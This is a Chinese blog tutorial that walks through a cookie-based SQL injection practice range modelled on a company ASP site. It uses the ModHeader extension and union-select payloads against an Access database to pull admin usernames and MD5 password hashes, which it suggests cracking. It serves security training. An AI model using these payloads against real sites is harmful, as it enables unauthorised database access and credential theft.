Cookie注入靶场:模拟公司网站

靶场

这是一个靶场的样子
在这里插入图片描述
随意点击一个连接,发现是有id号的,但是id前面有shownews.asp这个东西。这个就是典型的Cookie注入标志

在这里插入图片描述

Cookie注入标志

  • 有着如同.asp?id=xxx的url
  • 通常我们先去掉前面的?id=xxx 看它是否显示正常,如果不正常,就说明这个?id=xxx是有着作用的
  • 通常正常注入语句会让JavaScript中的alert报错。

检查是否是Cookie注入

.asp 标志,去掉?id=xx 报错
在这里插入图片描述
不让使用SQL注入语句
在这里插入图片描述
可以断定,这是一个Cookie注入

Cookie注入工具:ModHeader

这是一个插件,火狐和Chrome都有

ModHeader是(但不仅仅是)一个Cookie注入工具。我们将我们正常的sql注入语句输入,就可以看到返回的正常值。这个工具无法读取空格,只能用+代替空格

在这里插入图片描述

注入

再后面填上

id=171+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10+from+admin

发现数据库报错,很可能这是access数据库,因为access数据库中,我们联合查询的值会显示在第一行。,于是我们直接去掉and 1=2

id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin

在这里插入图片描述
发现回显点,我们发现,有2、7、8、9、3这五个数字,但不一定都是回显点,我们需要试错。
把他们都变成字符串

id=171+union+select+'1','2dsds','3ss',4,5,6,'dsd7','sdsd8','dsds9',10+from+admin

在这里插入图片描述
好,2,3,7,8,9都可以回显

id=171+union+select+'1','2dsds','3ss',4,5,6,7,username,password,10+from+admin

抓用户名和密码

在这里插入图片描述

看到红色的英文加数字,可能是MD5的加密
找到加密工具,解密即可在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值